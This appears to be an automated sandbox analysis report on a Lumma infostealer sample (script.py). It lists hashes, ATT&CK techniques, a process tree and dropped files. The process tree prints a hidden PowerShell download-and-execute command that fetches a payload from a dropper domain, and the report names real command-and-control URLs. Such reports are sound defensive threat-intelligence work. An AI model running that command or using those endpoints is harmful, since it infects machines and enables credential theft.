lumma | 6ec6c001e46e69a80acd54e349d6475a8198fc7178947c8cda9b56a244d6d6a3

Analysis

max time kernel
637s
max time network
633s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
06-01-2025 20:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

script.py
Size

1KB
MD5

447d04e6fcbef9b66eafa28b3a928a60
SHA1

4d716e1dd2520f1c9ab5d1a79f75c87a63101fa7
SHA256

6ec6c001e46e69a80acd54e349d6475a8198fc7178947c8cda9b56a244d6d6a3
SHA512

2c85aa2234e17bce10e51340fc99214e39fffe56b8c035aacd9be8f4a2c0806dcd8ce3f3762035904e43d4006e54f493fbccf32d7acdf9cfaec487453c5ece50

Score

10^/10

lumma discovery execution stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://kliphylj.shop/sercd.json

Extracted

Family

lumma

https://wholersorie.shop/api

https://tirepublicerj.shop/api

https://noisycuttej.shop/api

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 852 created 3396	852	powershell.exe	56

Blocklisted process makes network request 6 IoCs

flow	pid	Process
67	852	powershell.exe
93	5200	powershell.exe
97	5200	powershell.exe
99	5200	powershell.exe
103	5200	powershell.exe
107	5200	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
852	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 852 set thread context of 5200	852	powershell.exe	121

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133806684215912244"	chrome.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
908	chrome.exe
908	chrome.exe
4716	powershell.exe
4716	powershell.exe
4716	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
852	powershell.exe
5340	chrome.exe
5340	chrome.exe
5340	chrome.exe
5340	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeDebugPrivilege	4716	powershell.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeDebugPrivilege	852	powershell.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe
Token: SeShutdownPrivilege	908	chrome.exe
Token: SeCreatePagefilePrivilege	908	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe
908	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4476	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 908 wrote to memory of 1848	908	chrome.exe	86
PID 908 wrote to memory of 1848	908	chrome.exe	86
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 1624	908	chrome.exe	87
PID 908 wrote to memory of 3384	908	chrome.exe	88
PID 908 wrote to memory of 3384	908	chrome.exe	88
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89
PID 908 wrote to memory of 2384	908	chrome.exe	89

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3396
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\script.py
  2⤵
  - Modifies registry class
  PID:4532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:908
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff9393acc40,0x7ff9393acc4c,0x7ff9393acc58
    3⤵
    PID:1848
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1820,i,5893772518452791627,7849857732037490127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1812 /prefetch:2
    3⤵
    PID:1624
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2172,i,5893772518452791627,7849857732037490127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2404 /prefetch:3
    3⤵
    PID:3384
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2212,i,5893772518452791627,7849857732037490127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2436 /prefetch:8
    3⤵
    PID:2384
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2616,i,5893772518452791627,7849857732037490127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3204 /prefetch:1
    3⤵
    PID:3448
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3048,i,5893772518452791627,7849857732037490127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3252 /prefetch:1
    3⤵
    PID:4388
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3676,i,5893772518452791627,7849857732037490127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3744 /prefetch:1
    3⤵
    PID:3604
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4884,i,5893772518452791627,7849857732037490127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4892 /prefetch:8
    3⤵
    PID:636
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5020,i,5893772518452791627,7849857732037490127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5032 /prefetch:8
    3⤵
    PID:2220
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5048,i,5893772518452791627,7849857732037490127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4892 /prefetch:8
    3⤵
    PID:4356
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4904,i,5893772518452791627,7849857732037490127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4916 /prefetch:8
    3⤵
    PID:3376
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4900,i,5893772518452791627,7849857732037490127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5028 /prefetch:8
    3⤵
    PID:2084
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5096,i,5893772518452791627,7849857732037490127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4892 /prefetch:8
    3⤵
    PID:3076
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5144,i,5893772518452791627,7849857732037490127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5332 /prefetch:2
    3⤵
    PID:4420
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4976,i,5893772518452791627,7849857732037490127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3852 /prefetch:1
    3⤵
    PID:224
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4060,i,5893772518452791627,7849857732037490127,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=864 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4716
- - C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://kliphylj.shop/sercd.json'))"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:852
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:5200

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4476

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1396

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\3dd4e12a-9391-4300-92cc-fe02c5a4b4e1.tmp

Filesize
9KB

MD5
0c31b40a4465e89bd58c9d8a9be756ee

SHA1
057a36aac82b16da638a32df0f7d93b3633d0f95

SHA256
d355cca6da852fe28139c4795d71f3db57da11a011f9ab40398bfaef1b00f593

SHA512
d798d2c09e01521d79cfcb1716e0e225fe6df5ad3d65856dfe1d74cc57545fa7d723026b2e9abd81df99a7781f1d36a4b86d2fa46daf896fa273c7245086d58d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
130c811429441d571e5234a81274eec7

SHA1
0f926a6d888ca42066d34e7eb2ac5602814a1b0e

SHA256
7871f6eba50ba40e808fca40e47a9aeae9a4c82d57f072a90c6e0d73fc8590db

SHA512
05a0a061ea9c3a5cb08be5001cf9e473232fe56a9943d168b5f3aacef4d933815e34a668aaa8bc7efb707582a568b02e8ebbccd839a901132056baf27e216436

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
360B

MD5
cf081b88b5e8e9b780ec637f2182fb06

SHA1
94815f9d1fbdfd04e1227085c17291453fe5b49b

SHA256
1415466e6d2494e1a01f04503709d9240a9800c75eba0ac710400fb34bf1267b

SHA512
019ac65324a07f5e0fdc0b99c3a7ec8360cd265c55e5bf24a158ad311ef35107e05ec437e6467bc0ad2d247e9c612fb972523ae36a6901da31d1a30604203c12

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\_locales\en\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
7c939248eebbdd5d429afa4e47907cc0

SHA1
6a04b6645b1f8d810e2ffc43992799dd40b62b88

SHA256
2788767a8754d2521fa5f9e75664f1317d489e055be96bacaee7b006cca32879

SHA512
9b70969a7bedd3cc90147dc51d5253ef3ba33af47926d7fd93478822100cf022365bea1b1827625be1691d992428e1e3adc59473ad393f219f2cc900ed28954d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
0331e180a39ac26353056ea911652bdf

SHA1
fe2a5dd4856f41d7f83aa6e805d045c1b89aa405

SHA256
756b8971c49b39720d2336213cd94059123cbcdd2629f41884fca13de7b69e63

SHA512
042f788f2cdb98d294bc2d39d7ac304b1d30b3ed9220ce0e2cc59a1536df4798f2bbeb87406090e17da28bea6fe09c0934f35b661e1cc9d489c3a0fcb2a4ba48

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
d0d904be519ffa54aac7c9ac3d0d5d91

SHA1
25dc1aa94c43f22b9294d288dadded6ea19822a1

SHA256
fe27fd64bd4ba59d3840596150c66e018eef5a7ffce66a1ad86dde5f2a47e41d

SHA512
9f6a4c76a37a23f23cde16c54503fd167bb910fa2324ec82d165a99c07d11710518d549bbdc0c57418f26b14584e8939ca23bec462e162ca6fd86ecb67f95996

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
850B

MD5
8351793e0b884557f498ffdcbd26a0b6

SHA1
e245dab5706ddc52b6bc7c6bd0786529ee57d213

SHA256
fb83ca700a1d6f475a0f082863afaebba7053dab97e072af4ed9e20acdf09083

SHA512
be5e1c698d6ece4845e09238bb347bc9d93f1f2bc54fc127aca23e464e4b90ef97c98f63059d1f4e4ded5fa33bf28afe55c15f2fd697950d82fa5e45ba74bcd5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
4078ed4e95de4771b7a200743a5d360b

SHA1
6aab28e4311f3a07d891e87dd990cc0cd2976b6d

SHA256
d19ec91c8de4b06bc708803d6f61e44bddc28f9ccf4cfcb6568ad411be619d5f

SHA512
401c935f60192892de9f00b3ec13baf5a4c11669152be4b95c2dcb692b2e8e26d98373f36d2b29affdadc717880df5ef66f712d5c084ca1783a32ce9326ecf55

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
2d3b2804665c5a5f08913932b0734dd1

SHA1
a432f4273b6bc323166a2383b9aeeb1c0ceba52a

SHA256
037fa315b52f557af1c519119ba2231ee975a57f1fb894e01b276247d9108ef5

SHA512
57fd63ad27d2738a4c6b4ace45239abe1e2920d18d187b0cca34e647cb2da9dec09810302d9d12eaa015ee259fca9b5977cea0e89ef921cf50de8cd7b9db6e7b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
931207e662cc59f38c170cb514a83f66

SHA1
a9d249dc7cf0b77aabc30d30ac578540084a67a2

SHA256
705641a127f371b5df33e9f49c39e9db5dc85a259428cbdb49d859984dc408a1

SHA512
74f21fdb5bc722d89b02dd71ef7ac72e750d31d5b2f8dfda0f42f5d52d778ab44e8a8d3fa2a465d24a88fbe435bdcb1d6335126a66380ec29dc83e36a40c2ed6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
a11c53bcb73a579017684aeb13c7eb6e

SHA1
2ad11f31aeceddc2d803e38e7365a50389e13daa

SHA256
8fa82d14b5af11017fc7bc1fb74790034bfbc905e1b2a7eca1ec7b7f950334a6

SHA512
c65aa4ac07d6d85a7a62ed5a827811f3d6f1c6f221f8b7e839960aeaa946cec86ef8e3eed53f90c7cacedf0dfb2a5704f952881eae1b86d6d97dd611a5b9b985

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
3d6e3eaeecb5c3e8c729f385b74669a1

SHA1
4184be5a23dac93b77d18ea9b3be1755ce82761b

SHA256
c8562d8b3fe9162d76b7d9096bea537c3085a8f105f8e463edbdbcf994864e04

SHA512
